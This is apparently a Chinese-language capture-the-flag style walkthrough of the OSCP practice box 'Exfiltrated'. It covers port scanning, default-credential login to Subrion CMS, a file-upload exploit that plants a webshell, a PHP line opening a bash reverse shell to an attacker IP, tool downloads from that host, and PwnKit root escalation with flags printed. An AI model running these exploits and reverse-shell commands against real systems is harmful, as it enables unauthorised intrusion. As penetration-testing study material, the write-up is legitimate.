OSCP靶场--Exfiltrated
考点(1.cms 站点地图插入php反弹shell 2. CVE-2021-4034提权 3.root定时任务提权[CVE-2021-22204])
1.nmap扫描
bash
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 192.168.155.163 --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-03-13 13:03 EDT
Nmap scan report for 192.168.155.163
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
| 256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_ 256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://exfiltrated.offsec/
| http-robots.txt: 7 disallowed entries
| /backup/ /cron/? /front/ /install/ /panel/ /tmp/
|_/updates/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.55 seconds
2.user priv
2.1 发现管理员面板[默认密码登陆]:cms版本 Subrion CMS v4.2.1
bash
## google默认密码admin:admin登陆:
http://exfiltrated.offsec/panel/
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit Subrion CMS
Subrion CMS 4.2.1 - Arbitrary File Upload | php/webapps/49876.py
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/49876.py
Exploit: Subrion CMS 4.2.1 - Arbitrary File Upload
URL: https://www.exploit-db.com/exploits/49876
Path: /usr/share/exploitdb/exploits/php/webapps/49876.py
Codes: CVE-2018-19422
Verified: False
File Type: Python script, ASCII text executable, with very long lines (956)
Copied to: /root/Desktop/49876.py
### CVE-2018-19422 rce
┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel
[+] Success!
[+] Got CSRF token: mIUPOKjwTfQPSpbvwSNQoSfM7K7KeBVCDNxFFht0
[+] Trying to log in...
[x] Login failed... Check credentials
┌──(root㉿kali)-[~/Desktop]
└─# python 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: RBz9SBrREPnzSJo5U5xTjm4B1W12UmYXf4yGHIp0
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: duglezaogvkkmhi
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/duglezaogvkkmhi.phar
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
注意:
2.2 交互式shell【cms站点地图生成反弹shell】
bash
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 80
┌──(root㉿kali)-[~/Desktop]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.216 LPORT=443 -f elf -o shel443.elf
##
$ curl -o /var/www/html/subrion/zcmd.php http://192.168.45.216/zcmd.php
##
$ curl -o /tmp/linpeas.sh http://192.168.45.216/linpeas.sh
$ ls -al /tmp
total 820
drwxrwxrwt 2 root root 4096 Mar 13 17:47 .
drwxr-xr-x 20 root root 4096 Jan 7 2021 ..
-rw-r--r-- 1 www-data www-data 830030 Mar 13 17:47 linpeas.sh
$ chmod +x /tmp/linpeas.sh
$ ls -al /tmp
total 820
drwxrwxrwt 2 root root 4096 Mar 13 17:47 .
drwxr-xr-x 20 root root 4096 Jan 7 2021 ..
-rw-r--r-- 1 www-data www-data 830030 Mar 13 17:47 linpeas.sh
使用反向webshell:
上面的所有方式都反弹shell失败:查看writeup:https://lipa.tech/posts/pg-exfiltrated/
发现另一种反弹方式:system------》Hooks------》sitemapGeneration------》插入下面代码------》sava------》nc在kali监听------》点击Generate Sitemap反弹shell
Site Map Generator------》插入php代码------》点击Generate Sitemap后反弹shell:
php
exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.45.178/80 0>&1'");
3. root priv
3.1 CVE-2021-4034提权:
bash
## linpeas.sh枚举:
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root bash /opt/image-exif.sh
##
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
### CVE-2021-4034提权
www-data@exfiltrated:/tmp$ wget http://192.168.45.178:8000/CVE-2021-4034.py
wget http://192.168.45.178:8000/CVE-2021-4034.py
--2024-03-14 03:04:52-- http://192.168.45.178:8000/CVE-2021-4034.py
Connecting to 192.168.45.178:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3262 (3.2K) [text/x-python]
Saving to: 'CVE-2021-4034.py'
CVE-2021-4034.py 100%[===================>] 3.19K --.-KB/s in 0.001s
2024-03-14 03:04:53 (4.64 MB/s) - 'CVE-2021-4034.py' saved [3262/3262]
www-data@exfiltrated:/tmp$ chmod +x ./CVE-2021-4034.py
chmod +x ./CVE-2021-4034.py
www-data@exfiltrated:/tmp$ python3 ./CVE-2021-4034.py
python3 ./CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
id
uid=0(root) gid=33(www-data) groups=33(www-data)
# whoami
whoami
root
# uname -a
uname -a
Linux exfiltrated 5.4.0-74-generic #83-Ubuntu SMP Sat May 8 02:35:39 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
# cat /root/proof.txt
cat /root/proof.txt
7c08fe47f1fdddee1970c01bc246be58
# ls /home/
ls /home/
coaran
# cat /home/coaran/local.txt
cat /home/coaran/local.txt
5e686fd428f8c1db63fa9cb98adcda52
3.2 CVE-2021-22204[exiftool]配合root定时任务提权【定时任务引入有漏洞的开源工具】
bash
https://lipa.tech/posts/pg-exfiltrated/#escalation
##
https://al1z4deh.medium.com/proving-grounds-exfiltrated-cbf5a3209865
##
https://github.com/mr-tuhin/CVE-2021-22204-exiftool
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b
4.总结:
bash
## writeup:
https://lipa.tech/posts/pg-exfiltrated/
https://infosecwriteups.com/proving-grounds-practice-exfiltrated-walkthrough-61bcc041375b